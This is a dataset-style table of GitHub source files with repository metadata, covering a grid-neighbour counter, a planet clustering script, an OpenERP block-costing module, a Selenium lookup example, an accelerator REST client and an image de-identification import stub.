blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 2 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 69 | license_type stringclasses 2
values | repo_name stringlengths 5 118 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringlengths 4 63 | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 2.91k 686M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 23
values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 220
values | src_encoding stringclasses 30
values | language stringclasses 1
value | is_vendor bool 2
classes | is_generated bool 2
classes | length_bytes int64 2 10.3M | extension stringclasses 257
values | content stringlengths 2 10.3M | authors listlengths 1 1 | author_id stringlengths 0 212 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
15bc005d598cc93623857c43174d7110fd878d93 | 603848284fa946b17783779966fe84ed7bcbf337 | /count_neighbours.py | efd86fb001e51c8dc568ba21e88b03d8c661d14a | [] | no_license | bajun/checkiotasks | 70e0ebc08813f13e536f82d69ab18020da8c5c3a | 29e5fcacfbf7f97c847bbf7827c5caaddae8d274 | refs/heads/master | 2021-01-19T19:35:38.248693 | 2015-01-30T12:18:27 | 2015-01-30T12:18:27 | 30,067,520 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 352 | py | def count_neighbours(grid, row, col):
counter = 0
numrows = len(grid)
numcols = len(grid[0])
for i in range(row-1,row+2):
for j in range(col-1,col+2):
if ([i,j] != [row,col]) and i>=0 and j>=0 and i<=numrows-1 and j<=numcols-1:
if ((grid[i][j]==1)):
counter+=1
return counter | [
"srglvk3@gmail.com"
] | srglvk3@gmail.com |
cd258b1c305670326b2579d6c6bf9a0a23e40a00 | 40be3b0e23b27539998f016ac94c87de34d34408 | /hw40.py | 2f966bf4e0dd3233f779de95270faf1e10606ffd | [] | no_license | ChandanaD1/react-native-app | 83e8e0aee9d74329d2338a0a321d8d3d09a506b5 | 6f6ecd4e0462aacbd60b2c400be5b1afe4d14e8c | refs/heads/main | 2023-09-03T21:05:19.685986 | 2021-10-16T03:07:48 | 2021-10-16T03:07:48 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,136 | py | # interpreting results
import csv
import pandas as pd
import plotly.express as px
from sklearn.cluster import KMeans
import matplotlib.pyplot as plt
import seaborn as sb
rows = []
with open("main.csv","r") as f:
csvreader = csv.reader(f)
for row in csvreader:
rows.append(row)
headers = row[0]
planet_data_rows = row[1:]
planet_masses = []
planet_radiuses = []
planet_names = []
for planet_data in planet_data_rows:
planet_masses.append(planet_data[3])
planet_radiuses.append(planet_data[7])
planet_names.append(planet_data[11])
planet_gravity = []
for index, value in enumerate(planet_names):
gravity = (float(planet_masses[index])*1.989e+30) / (float(planet_radiuses[index])*float(planet_radiuses[index])*.989e+30)
planet_gravity.append(gravity)
fig = px.scatter(x=planet_radiuses, y=planet_masses, size=planet_gravity, hover_data=[planet_names])
fig.show()
X = []
for index, planet_mass in enumerate(planet_masses):
temp_list = [
planet_radiuses[index],
planet_mass
]
X.append(temp_list)
wcss = []
for i in range(1, 11):
kmeans = KMeans(n_clusters=i, init='k-means++', random_state = 42)
kmeans.fit(X)
wcss.append(kmeans.inertia_)
plt.figure(figsize=(10,5))
sb.lineplot(range(1, 11), wcss, marker='o', color='red')
plt.title('The Elbow Method')
plt.xlabel('Number of clusters')
plt.ylabel('WCSS')
plt.show()
gravity_planets_range = []
for index, gravity in enumerate(planet_gravity):
if gravity<300 and gravity>150:
gravity_planets_range.append(planet_data_rows[index])
suitable_planets = []
for planet_data in gravity_planets_range:
if planet_data[2] <= 100:
suitable_planets.append(planet_data)
print(len(suitable_planets))
planet_distance = []
for planet_data in planet_data_rows:
planet_distance.append(planet_data[8])
graph1 = px.bar(x = planet_names, y = planet_mass)
graph2 = px.bar(x = planet_names, y = planet_radiuses)
graph3 = px.bar(x = planet_names, y = planet_gravity)
graph4 = px.bar(x = planet_names, y = planet_distance)
graph1.show()
graph2.show()
graph3.show()
graph4.show()
| [
"noreply@github.com"
] | ChandanaD1.noreply@github.com |
9ac417944b33f131ee08e9959df0faa36b85555a | 1518039c3d1e139753547562c3cb3241e2b615a1 | /src/doodle_config.py | 2d7f9303d624d3e9f6022984123a6ce4b8af896a | [] | no_license | waymobetta/doodle | cea9956919efb8607ec5c253d8fc068f739cd0e5 | 53b0946f2d175eccc06d9b3d0541f04319bc9d0f | refs/heads/master | 2023-04-29T20:27:10.001110 | 2020-12-16T17:24:51 | 2020-12-16T17:24:51 | 269,188,861 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 406 | py | #!/usr/bin/env python3
import os
cfg = {
# jrnl CLI sets this: /Users/ZETTLEKASTEN/.config/jrnl/jrnl.yaml
'jrnl_config_path': os.environ['JRNL_CONFIG_PATH'],
# jrnl CLI sets this: /Users/ZETTLEKASTEN/.local/share/jrnl/
'jrnl_txt_path': os.environ['JRNL_TXT_PATH'],
# /Users/ZETTLEKASTEN/jrnl-data/
'jrnl_json_path': os.environ['JRNL_JSON_PATH']
}
| [
"jbroethke@gmail.com"
] | jbroethke@gmail.com |
7205410b8b4aa4eca29cef8453728831c60f9c95 | 895f79e57861f2e2d552750fe56b5f742bdbd4cb | /tcv_block_cost/model/tcv_block_cost.py | 9caeec8a8e99bde1b85ad43139203c8483fd6f97 | [] | no_license | Tecvemar/openerp60 | e9899eebcfa150dd52537db8dcbf7264fafc63cd | 8534c448f63c71e57d91b21656f1bc1aa8f7aea8 | refs/heads/master | 2023-02-15T04:55:05.817013 | 2023-01-26T21:01:35 | 2023-01-26T21:01:35 | 74,976,919 | 1 | 1 | null | 2022-01-21T14:42:29 | 2016-11-28T13:45:07 | Python | UTF-8 | Python | false | false | 23,295 | py | # -*- encoding: utf-8 -*-
##############################################################################
# Company: Tecvemar, c.a.
# Author: Juan Márquez
# Creation Date: 2013-08-26
# Version: 0.0.0.1
#
# Description:
#
#
##############################################################################
#~ from datetime import datetime
from osv import fields, osv
from tools.translate import _
#~ import pooler
import decimal_precision as dp
import time
#~ import netsvc
##-------------------------------------------------------------- tcv_block_cost
class tcv_block_cost(osv.osv):
_name = 'tcv.block.cost'
_description = ''
_method_types = {'qty': 'By units', 'size': 'By sizes', 'manual': 'Manual'}
##-----------------------------------------------------
def default_get(self, cr, uid, fields, context=None):
context = context or {}
data = super(tcv_block_cost, self).\
default_get(cr, uid, fields, context)
if context.get('active_model') == u'account.invoice' and \
context.get('active_id'):
obj_inv = self.pool.get('account.invoice')
inv = obj_inv.browse(cr, uid, context.get('active_id'),
context=context)
data.update(
{'date': inv.date_document,
'invoice_id': inv.id,
'supplier_invoice_number': inv.supplier_invoice_number,
'partner_id': inv.partner_id.id,
'transp_amount': inv.amount_untaxed,
'invoice_name': inv.name,
'invoice_date': inv.date_document})
return data
##----------------------------------------------------- _internal methods
def _update_lot_cost(self, cr, uid, ids, context=None):
ids = isinstance(ids, (int, long)) and [ids] or ids
obj_lot = self.pool.get('stock.production.lot')
for item in self.browse(cr, uid, ids, context={}):
for block in item.lot_ids:
obj_lot.write(cr, uid, block.prod_lot_id.id,
{'property_cost_price': block.cost_unit,
'date': block.date_arrival}, context=context)
def _gen_account_move_line(self, company_id, partner_id, account_id, name,
debit, credit):
return (0, 0, {
'auto': True,
'company_id': company_id,
'partner_id': partner_id,
'account_id': account_id,
'name': name,
'debit': debit,
'credit': credit,
'reconcile': False,
})
def _gen_account_move(self, cr, uid, ids, context=None):
obj_move = self.pool.get('account.move')
move_id = None
for item in self.browse(cr, uid, ids, context={}):
i = item.invoice_id
transport_inv = \
_('\n\t\tNº %s, Supplier: %s, Description: %s, date: %s') % \
(i.number, i.partner_id.name, i.name, i.date_document)
period_id = self.pool.get('account.period').\
find(cr, uid, dt=item.date)
move = {
'ref': '%s %s' % (_('Block costing:'), item.name),
'journal_id': item.journal_id.id,
'date': item.date,
'period_id': period_id[0] if period_id else 0,
'company_id': item.company_id.id,
'state': 'draft',
'to_check': False,
'narration': _('Block costing (%s):\n\n\t' +
'Transport invoice: %s\n\n\tBlocks:') %
(_(self._method_types.get(item.type, '')),
transport_inv),
}
lines = []
for line in item.lot_ids:
line_name = '%s %s' % (line.prod_lot_id.name,
line.product_id.name)
line_acc = (
line.product_id.property_stock_account_input and
line.product_id.property_stock_account_input.id) or \
(line.product_id.categ_id.
property_stock_account_input_categ and
line.product_id.categ_id.
property_stock_account_input_categ.id)
if not line_acc:
raise osv.except_osv(
_('Error!'),
_('Can\'t find the stock input account for %s ' +
'product') %
(line.product_id.name))
move.update({'narration': '%s\n\t\t%s' %
(move['narration'], line_name)})
lines.append(self._gen_account_move_line(
item.company_id.id, item.partner_id.id,
line_acc, '%s %s' % (_('Block costing:'), line_name),
line.transp_unit, 0))
lines.append(self._gen_account_move_line(
item.company_id.id, item.partner_id.id,
item.account_id.id, move['ref'], 0,
item.transp_amount))
lines.reverse()
move.update({'line_id': lines})
move_id = obj_move.create(cr, uid, move, context)
obj_move.post(cr, uid, [move_id], context=context)
if move_id:
self.write(cr, uid, item.id, {'move_id': move_id},
context=context)
#~ self.do_reconcile(cr, uid, item, move_id, context)
return move_id
##----------------------------------------------------- function fields
_columns = {
'name': fields.char('Ref:', size=64, required=False, readonly=True),
'date': fields.date('Date', required=True, readonly=True,
states={'draft': [('readonly', False)]},
select=True,
help="The day of block arrival and account move"),
'invoice_id': fields.many2one('account.invoice', 'Number',
ondelete='restrict', select=True,
required=True, readonly=True,
states={'draft': [('readonly', False)]}),
'invoice_name': fields.related('invoice_id', 'name', type='char',
string='Description', size=64,
store=False, readonly=True),
'supplier_invoice_number': fields.related(
'invoice_id', 'supplier_invoice_number', type='char',
string='Invoice #', size=64, store=False, readonly=True),
'partner_id': fields.related('invoice_id', 'partner_id',
type='many2one', relation='res.partner',
string='Supplier', store=False,
readonly=True),
'invoice_date': fields.related('invoice_id', 'date_document',
type='date', string='Date inv',
store=False, readonly=True),
'transp_amount': fields.float('Amount', digits_compute=dp.
get_precision('Account'), required=True,
readonly=True,
states={'draft': [('readonly', False)]}),
'lot_ids': fields.one2many('tcv.block.cost.lots', 'line_id', 'String',
readonly=True,
states={'draft': [('readonly', False)]}),
'type': fields.selection(
_method_types.items(), string='Method', required=True,
readonly=True, states={'draft': [('readonly', False)]},
help="Method to distribute transportation cost:\n" +
"by units, by block size (total volume) or manual"),
'company_id': fields.many2one('res.company', 'Company',
required=True, readonly=True,
ondelete='restrict'),
'journal_id': fields.many2one('account.journal', 'Journal',
required=True, ondelete='restrict',
readonly=True,
states={'draft': [('readonly', False)]}),
'account_id': fields.many2one(
'account.account', 'Transp. account', required=True,
ondelete='restrict', help="Account for block transport (stock)",
readonly=True, states={'draft': [('readonly', False)]}),
'move_id': fields.many2one('account.move', 'Account move',
ondelete='restrict', select=True,
readonly=True,
help="The move of this entry line."),
'validator': fields.many2one(
'res.users', 'Approved by', readonly=True, select=True,
ondelete='restrict'),
'note': fields.char('Notes', size=128, required=False,
readonly=False),
'prod_lot_id': fields.related('lot_ids', 'prod_lot_id',
type='many2one',
relation='stock.production.lot',
string='Production lot'),
'state': fields.selection([('draft', 'Draft'), ('done', 'Done'),
('cancel', 'Cancelled')],
string='State', required=True,
readonly=True),
}
_defaults = {
'name': lambda *a: '/',
'type': lambda *a: 'qty',
'state': lambda *a: 'draft',
'company_id': lambda self, cr, uid, c: self.pool.get('res.company').
_company_default_get(cr, uid, 'obj_name', context=c),
'date': lambda *a: time.strftime('%Y-%m-%d'),
}
_sql_constraints = [
('invoice_id_uniq', 'UNIQUE(invoice_id)',
'The transport invoice must be unique!'),
]
##-----------------------------------------------------
##----------------------------------------------------- public methods
##----------------------------------------------------- buttons (object)
def compute_block_cost(self, cr, uid, ids, context=None):
ids = isinstance(ids, (int, long)) and [ids] or ids
obj_lin = self.pool.get('tcv.block.cost.lots')
roundto = 2
for item in self.browse(cr, uid, ids, context={}):
line_ids = map(lambda x: x.id, item.lot_ids)
if line_ids:
if item.type == 'qty':
#~ count groups
groups = {}
for block in item.lot_ids:
if block.group == 0:
groups.update({block.prod_lot_id.name: block})
else:
if groups.get(block.group):
groups[block.group].append(block)
else:
groups.update({block.group: [block]})
transp_unit = round(item.transp_amount /
len(groups), roundto)
for g in groups:
if isinstance(g, (int, long)):
vol = group_tot = 0
for i in groups[g]:
vol += i.block_size
for i in groups[g]:
transp_group = round((transp_unit *
i.block_size) /
vol, roundto)
obj_lin.write(cr, uid, i.id,
{'transp_unit': transp_group},
context=context)
group_tot += transp_group
else:
obj_lin.write(cr, uid, groups[g].id,
{'transp_unit': transp_unit},
context=context)
elif item.type == 'size':
tot_size = 0
for block in item.lot_ids:
tot_size += block.block_size
for block in item.lot_ids:
transp_unit = round((item.transp_amount *
block.block_size) /
tot_size, roundto)
obj_lin.write(cr, uid, block.id,
{'transp_unit': transp_unit},
context=context)
#~ else: ## manual
#~ return True
return True
##----------------------------------------------------- on_change...
def on_change_invoice_id(self, cr, uid, ids, invoice_id):
if invoice_id:
obj_invl = self.pool.get('account.invoice')
invl = obj_invl.browse(cr, uid, invoice_id, context=None)
res = {'value':
{'supplier_invoice_number': invl.supplier_invoice_number,
'partner_id': invl.partner_id.id,
'transp_amount': invl.amount_untaxed,
'invoice_name': invl.name,
'invoice_date': invl.date_document}}
return res
##----------------------------------------------------- create write unlink
def create(self, cr, uid, vals, context=None):
if not vals.get('name') or vals.get('name') == '/':
vals.update({'name': self.pool.get('ir.sequence').
get(cr, uid, 'tcv.block.cost')})
res = super(tcv_block_cost, self).create(cr, uid, vals, context)
return res
def unlink(self, cr, uid, ids, context=None):
unlink_ids = []
for item in self.browse(cr, uid, ids, context={}):
if item.state in ('draft', 'cancel'):
unlink_ids.append(item.id)
else:
raise osv.except_osv(
_('Invalid action !'),
_('Cannot delete block costing that are already Done!'))
res = super(tcv_block_cost, self).unlink(cr, uid, ids, context)
return res
##----------------------------------------------------- Workflow
def button_draft(self, cr, uid, ids, context=None):
vals = {'state': 'draft'}
return self.write(cr, uid, ids, vals, context)
def button_done(self, cr, uid, ids, context=None):
self.compute_block_cost(cr, uid, ids, context)
self._update_lot_cost(cr, uid, ids, context)
self._gen_account_move(cr, uid, ids, context)
vals = {'state': 'done', 'validator': uid}
return self.write(cr, uid, ids, vals, context)
def button_cancel(self, cr, uid, ids, context=None):
ids = isinstance(ids, (int, long)) and [ids] or ids
obj_move = self.pool.get('account.move')
obj_lot = self.pool.get('stock.production.lot')
for item in self.browse(cr, uid, ids, context={}):
if item.move_id:
move = obj_move.browse(cr, uid, item.move_id.id, context=None)
if move.state == 'draft':
self.write(cr, uid, item.id, {'move_id': None},
context=context)
obj_move.unlink(cr, uid, [move.id])
# Clear actual block cost
for block in item.lot_ids:
obj_lot.write(cr, uid, block.prod_lot_id.id,
{'property_cost_price': 0}, context=context)
vals = {'state': 'cancel', 'validator': None}
return self.write(cr, uid, ids, vals, context)
def test_draft(self, cr, uid, ids, *args):
return True
def test_done(self, cr, uid, ids, *args):
ids = isinstance(ids, (int, long)) and [ids] or ids
for item in self.browse(cr, uid, ids, context={}):
amount = item.transp_amount
for line in item.lot_ids:
if not line.block_amount:
raise osv.except_osv(
_('Error!'),
_('Must indicate a cost for block: %s') %
(line.prod_lot_id.name))
amount -= line.transp_unit
if abs(amount) > 0.0001:
raise osv.except_osv(
_('Error!'),
_('The transport\'s amount dosen\'t corresponds with sum ' +
'of the transport lines'))
return True
def test_cancel(self, cr, uid, ids, *args):
ids = isinstance(ids, (int, long)) and [ids] or ids
for item in self.browse(cr, uid, ids, context={}):
if item.move_id and item.move_id.id:
move = self.pool.get('account.move').\
browse(cr, uid, item.move_id.id, context=None)
if move.state == 'posted':
raise osv.except_osv(
_('Error!'),
_('You can not cancel a block costing while the ' +
'account move is posted.'))
return True
tcv_block_cost()
##--------------------------------------------------------- tcv_block_cost_lots
class tcv_block_cost_lots(osv.osv):
_name = 'tcv.block.cost.lots'
_description = ''
##-----------------------------------------------------
##----------------------------------------------------- _internal methods
def _compute_all(self, cr, uid, ids, field_name, arg, context=None):
res = {}
for item in self.browse(cr, uid, ids, context=context):
cost_tot = item.block_amount + item.transp_unit
res[item.id] = {'cost_total': cost_tot,
'cost_unit': round(cost_tot / item.block_size, 2),
}
return res
##----------------------------------------------------- function fields
_columns = {
'line_id': fields.many2one('tcv.block.cost', 'Cost', required=True,
ondelete='cascade'),
'prod_lot_id': fields.many2one(
'stock.production.lot', 'Production lot', required=True,
domain="[('stock_driver', '=', 'block')]"),
'product_id': fields.related(
'prod_lot_id', 'product_id',
type='many2one', relation='product.product', string='Product',
store=False, readonly=True),
'block_size': fields.related(
'prod_lot_id', 'lot_factor',
type='float', string='Block size', store=False, readonly=True,
digits_compute=dp.get_precision('Extra UOM data')),
'block_invoice_id': fields.many2one(
'account.invoice', 'Block inv.',
ondelete='restrict', select=True, required=False),
'block_amount': fields.float(
'Block cost', digits_compute=dp.get_precision('Account')),
'transp_unit': fields.float(
'Transportation', digits_compute=dp.get_precision('Account')),
'cost_total': fields.function(
_compute_all, method=True, type='float', string='Total amount',
digits_compute=dp.get_precision('Account'), multi='all'),
'cost_unit': fields.function(
_compute_all, method=True, type='float', string='Unit cost',
digits_compute=dp.get_precision('Account'), multi='all'),
'waybill': fields.char(
'Waybill', size=32, required=False, readonly=False),
'group': fields.integer(
'Group transport', required=True,
help="Indicate 0 for no group or any nro to indicate " +
"the \"group\" of blocks transported"),
'note': fields.char(
'Notas', size=128, required=False, readonly=False),
'date_arrival': fields.date(
'Date arrival', required=True, readonly=True, select=True,
states={'draft': [('readonly', False)]},
help="Date of block arrival"),
'move_ids': fields.related(
'prod_lot_id', 'move_ids', type='one2many', relation='stock.move',
string='Moves for this lot', store=False, readonly=True),
}
_defaults = {
'group': 0,
}
_sql_constraints = [
('block_amount_gt_zero', 'CHECK(block_amount>=0)',
'The block cost quantity must be >= 0!'),
('transp_unit_gt_zero', 'CHECK(transp_unit>=0)',
'The transportation cost quantity must be >= 0!'),
('prod_lot_id_uniq', 'UNIQUE(prod_lot_id)',
'The block must be unique!'),
]
##-----------------------------------------------------
##----------------------------------------------------- public methods
##----------------------------------------------------- buttons (object)
def button_set_block_cost(self, cr, uid, ids, context=None):
ids = isinstance(ids, (int, long)) and [ids] or ids
obj_lot = self.pool.get('stock.production.lot')
for item in self.browse(cr, uid, ids, context={}):
if item.prod_lot_id and item.block_amount and item.transp_unit:
obj_lot.write(cr, uid, item.prod_lot_id.id,
{'property_cost_price': item.cost_unit},
context=context)
return True
##----------------------------------------------------- on_change...
def on_change_prod_lot_id(self, cr, uid, ids, prod_lot_id):
res = {}
if prod_lot_id:
obj_invl = self.pool.get('account.invoice.line')
obj_lot = self.pool.get('stock.production.lot')
lot = obj_lot.browse(cr, uid, prod_lot_id, context=None)
res = {'value': {'product_id': lot.product_id.id,
'block_size': lot.lot_factor,
}}
invl_id = obj_invl.search(cr, uid,
[('prod_lot_id', '=', prod_lot_id)])
if invl_id and len(invl_id) == 1:
invl = obj_invl.browse(cr, uid, invl_id[0], context=None)
res['value'].update({'block_invoice_id': invl.invoice_id.id,
'block_amount': invl.price_subtotal})
return res
def on_change_amount(self, cr, uid, ids, block_amount, transp_unit,
block_size):
res = {}
if block_amount and transp_unit and block_size:
cost_tot = block_amount + transp_unit
data = {'cost_total': cost_tot,
'cost_unit': round(cost_tot / block_size, 2)}
res = {'value': data}
return res
##----------------------------------------------------- create write unlink
##----------------------------------------------------- Workflow
tcv_block_cost_lots()
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| [
"g8787@hotmail.com"
] | g8787@hotmail.com |
ca84176dcc4543867190893bc2a6e3aca04b239d | 107941a50c3adc621563fe0254fd407ea38d752e | /spider_01.py | 32d42c2a2ca6ef3b58162d8cb4c81ff8efba1721 | [] | no_license | zhangliang852469/spider_ | 758a4820f8bd25ef6ad0edbd5a4efbaaa410ae08 | 718208c4d8e6752bbe8d66a209e6d7446c81d139 | refs/heads/master | 2020-04-05T07:12:03.790358 | 2018-11-08T07:17:22 | 2018-11-08T07:17:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,409 | py | #!/usr/bin/env python3
# -*- coding:utf-8 -*-
""" 查找节点 例:淘宝"""
"""
find_element_by_id
find_element_by_name
find_element_by_xpath
find_element_by_link_text
find_element_by_partial_link_text
find_element_by_tag_name
find_element_by_class_name
find_element_by_css_selector
"""
from selenium import webdriver
# 首先初始化启动浏览器
browser = webdriver.Chrome()
# 打开网页
browser.get('https://www.taobao.com')
# 查找节点可以通过ID, css selector, xpath, name来查找
input_first = browser.find_element_by_id('q')
input_second = browser.find_element_by_css_selector('#q')
input_third = browser.find_element_by_xpath('//*[@id="q"]')
input_fouth = browser.find_element_by_name('q')
# 输出查找
print(input_first, '\n', input_second,'\n', input_third,'\n', input_fouth)
browser.close()
# Selenium 还提供了通用的 find_element() 方法,它需要传入两个参数,一个是查找的方式
# By,另一个就是值,实际上它就是 find_element_by_id() 这种方法的通用函数版本
# 比如 find_element_by_id(id) 就等价于 find_element(By.ID, id),二者得到的结果完全一致。
# from selenium import webdriver
# from selenium.webdriver.common.by import By
#
# browser = webdriver.Chrome()
# browser.get('https://www.taobao.com')
# input_first = browser.find_element(By.ID, 'q')
# print(input_first)
# browser.close()
| [
"710567585@qq.com"
] | 710567585@qq.com |
33c240d56a41129cdf2b4c55802ff56ea5f5c10e | 986f26587e48784a11746c6298000af8e07dd1b7 | /apyfal/client/rest.py | 4a58ea30f6f1ae1fab1a8d268f7239df28d22e56 | [
"Apache-2.0"
] | permissive | JGoutin/apyfal | 118e55c4e31de1e67d068ef937ebddac001ab8d9 | 22dfe791e0956d3d3353daeba0c7a21dfe2f9b77 | refs/heads/master | 2020-12-09T01:03:43.049473 | 2020-01-10T09:57:58 | 2020-01-10T09:57:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,766 | py | # coding=utf-8
"""Accelerator REST client.
This client allows remote accelerator control."""
import json as _json
import os.path as _os_path
import shutil as _shutil
from uuid import uuid4 as _uuid
from requests.exceptions import HTTPError as _HTTPError
from requests_toolbelt.multipart.encoder import (
MultipartEncoder as _MultipartEncoder)
from apyfal import __version__ as _apyfal_version
import apyfal._utilities as _utl
import apyfal.exceptions as _exc
import apyfal.configuration as _cfg
from apyfal.client import AcceleratorClient as _Client
from apyfal.storage import copy as _srg_copy
class RESTClient(_Client):
"""
Remote Accelerator OpenAPI REST client.
Args:
accelerator (str): Name of the accelerator to initialize.
accelize_client_id (str): Accelize Client ID.
accelize_secret_id (str): Accelize Secret ID.
host_ip (str): IP or URL address of the accelerator host.
ssl_cert_crt (path-like object or file-like object or bool):
Public ".crt" key file of the SSL ssl_cert_key used by host to
provides HTTPS. If provided, the ssl_cert_key is verified on each
request. If not provided, search for a generated certificate.
If False, disable HTTPS.
config (apyfal.configuration.Configuration, path-like object or file-like object):
If not set, will search it in current working directory,
in current user "home" folder. If none found, will use default
configuration values.
Path-like object can be path, URL or cloud object URL.
"""
#: Client type
NAME = 'REST'
# Client is remote or not
REMOTE = True
# REST API routes
_REST_API = {
'process': '/v1.0/process/',
'start': '/v1.0/configuration/',
'stop': '/v1.0/stop/'}
# Number of retries for a request
_REQUEST_RETRIES = 3
def __init__(self, accelerator=None, host_ip=None, ssl_cert_crt=None,
*args, **kwargs):
# Initialize client
_Client.__init__(self, accelerator=accelerator, *args, **kwargs)
# Initializes HTTP client
self._ssl_cert_crt = ssl_cert_crt
self._endpoints = {}
# Mandatory parameters
if not accelerator:
raise _exc.ClientConfigurationException(
"'accelerator' argument is mandatory.")
# Pass host URL if already defined.
if host_ip:
self.url = host_ip
@property
@_utl.memoizedmethod
def _session(self):
"""
Requests session
Returns:
requests.sessions.Session: Session
"""
session_kwargs = dict(max_retries=self._REQUEST_RETRIES)
# Gets SSL certificate
if self._ssl_cert_crt is None and _os_path.exists(_cfg.APYFAL_CERT_CRT):
# Uses default certificate if not provided and not not False
self._ssl_cert_crt = _cfg.APYFAL_CERT_CRT
elif (self._ssl_cert_crt and (hasattr(self._ssl_cert_crt, 'read') or
not _os_path.exists(self._ssl_cert_crt))):
# Copies certificate locally if not reachable by local path
ssl_cert_crt = _os_path.join(self._tmp_dir, str(_uuid()))
_srg_copy(self._ssl_cert_crt, ssl_cert_crt)
self._ssl_cert_crt = ssl_cert_crt
# Enables certificates verification
if self._ssl_cert_crt:
session_kwargs['verify'] = self._ssl_cert_crt
# Disables hostname verification if wildcard certificate
from apyfal._certificates import \
get_host_names_from_certificate
with open(self._ssl_cert_crt, 'rb') as crt_file:
if get_host_names_from_certificate(crt_file.read()) == ['*']:
session_kwargs['assert_hostname'] = False
# Force url to use HTTPS
self._url = _utl.format_url(
self._url, force_secure=bool(self._ssl_cert_crt))
# Initializes session
return _utl.http_session(**session_kwargs)
@property
def url(self):
"""
URL of the accelerator host.
Returns:
str: URL
"""
return self._url
@url.setter
def url(self, url):
"""
URL of the accelerator host.
Args:
url (str): URL.
"""
# Check URL
if not url:
raise _exc.ClientConfigurationException("Host URL is not valid.")
self._url = url = _utl.format_url(
url, force_secure=bool(self._ssl_cert_crt))
# Updates endpoints
for route in self._REST_API:
self._endpoints[route] = url + self._REST_API[route]
@property
@_utl.memoizedmethod
def _configuration_url(self):
"""Last configuration URL"""
# Get last configuration, if any
try:
endpoint = self._endpoints['start']
except KeyError:
raise _exc.ClientConfigurationException(
'Unknown host URL, please run accelerator "start" method.')
response = self._session.get(endpoint)
try:
last_config = response.json()['results'][0]
except (KeyError, IndexError, ValueError):
return
# The last configuration URL should be keep in order to not request
# it to user.
if last_config['used'] != 0:
return last_config['url']
@property
def ssl_cert_crt(self):
"""
SSL Certificate of the accelerator host.
Returns:
str: Path to ssl_cert_key.
"""
return self._ssl_cert_crt
def _is_alive(self):
"""
Check if accelerator URL exists.
Raises:
ClientRuntimeException: If URL not alive
"""
if self.url is None:
raise _exc.ClientRuntimeException("No accelerator running")
if not _utl.check_url(self.url, max_retries=2):
raise _exc.ClientRuntimeException(
gen_msg=('unable_reach_url', self._url))
def _start(self, src, parameters):
"""
Client specific start implementation.
Args:
src (str or file-like object): Input file.
parameters (dict): Parameters dict.
Returns:
dict: response.
"""
# Save Apyfal version in parameters
parameters['env']['apyfal_version'] = _apyfal_version
# Post accelerator configuration
fields = {'parameters': _json.dumps(parameters)}
if src:
fields['datafile'] = (
'src', src, 'application/octet-stream')
multipart = _MultipartEncoder(fields=fields)
response = self._session.post(
self._endpoints['start'], data=multipart, headers={
'Content-Type': multipart.content_type})
# Checks response, gets Configuration result
response_dict = self._raise_for_error(response)
config_result = response_dict['parametersresult']
# Checks if configuration was successful
response_dict = self._raise_for_error(self._session.get(
self._endpoints['start'] + str(response_dict['id'])))
# Memorizes configuration
self._cache['_configuration_url'] = response_dict['url']
# Returns response
config_result['url_config'] = self._configuration_url
config_result['url_instance'] = self.url
return config_result
def _process(self, src, dst, parameters):
"""
Client specific process implementation.
Args:
src (file-like object): Input data.
dst (file-like object): Output data.
parameters (dict): Parameters dict.
Returns:
dict: response dict.
"""
# Check if configuration was done
if self._configuration_url is None:
raise _exc.ClientConfigurationException(
"AcceleratorClient has not been configured. "
"Use 'start' function.")
# Post processing request
fields = {
'parameters': _json.dumps(parameters),
'configuration': self._configuration_url}
if src:
fields['datafile'] = 'src', src, 'application/octet-stream'
multipart = _MultipartEncoder(fields=fields)
response = self._session.post(
self._endpoints['process'], data=multipart, headers={
'Content-Type': multipart.content_type})
# Check response and append process ID to process URL
process_url = self._endpoints['process'] + str(
self._raise_for_error(response)['id'])
# Get result
try:
# Wait processing
while True:
response_dict = self._raise_for_error(
self._session.get(process_url))
if response_dict['processed']:
break
# Gets result file
if dst:
response = self._session.get(
response_dict['datafileresult'], stream=True)
_shutil.copyfileobj(response.raw, dst)
# Gets result dict
return response_dict['parametersresult']
finally:
# Deletes process result on server
self._session.delete(process_url)
def _stop(self):
"""
Client specific stop implementation.
Returns:
dict : response.
"""
try:
self._is_alive()
except _exc.ClientRuntimeException:
# No AcceleratorClient to stop
return dict()
# Sends stop to server
return self._session.get(self.url + self._REST_API['stop']).json()
@staticmethod
def _raise_for_error(response):
"""
Raises for error and returns response dict.
Args:
response (requests.Response): Response
Returns:
dict: Response JSON dict
Raises:
apyfal.exceptions.ClientRuntimeException: Error.
"""
# Handles requests HTTP errors
try:
response.raise_for_status()
except _HTTPError as exception:
raise _exc.ClientRuntimeException(exc=exception)
# Gets result as dict
try:
response_dict = response.json()
except ValueError:
raise _exc.ClientRuntimeException(
"Unable to parse host response", exc=response.text)
# Checks error flag
if response_dict.get('inerror', True):
raise _exc.ClientRuntimeException(
"Host returned an error", exc=response.text)
return response_dict
| [
"jgoutin@accelize.com"
] | jgoutin@accelize.com |
8ae995081466ba06b2a88a80dbe3340a77564352 | 155ccd0d511d48a40aa391be6363c7614af67876 | /deid_fac_rec.py | faacaee02ad5126fa83de391c880526d25886217 | [] | no_license | drewclausen/HIsummerproject | dcce722ac97d07e37ed2e3275d1b9e70457587c9 | 8596a2132abdf7a2ee500d8a8a089ffb5db43fbd | refs/heads/master | 2020-03-18T13:15:25.405100 | 2018-07-11T23:24:01 | 2018-07-11T23:24:01 | 134,771,880 | 0 | 2 | null | 2018-06-08T00:10:51 | 2018-05-24T21:44:17 | Python | UTF-8 | Python | false | false | 1,192 | py | from PIL import Image
from PIL import ImageFilter
from PIL import ImageEnhance
from StringIO import StringIO
import pandas as pd
import numpy as np
import pytesseract
import glob
import cv2
import future_builtins
import subprocess
import os
import sys
import re
import face_recognition
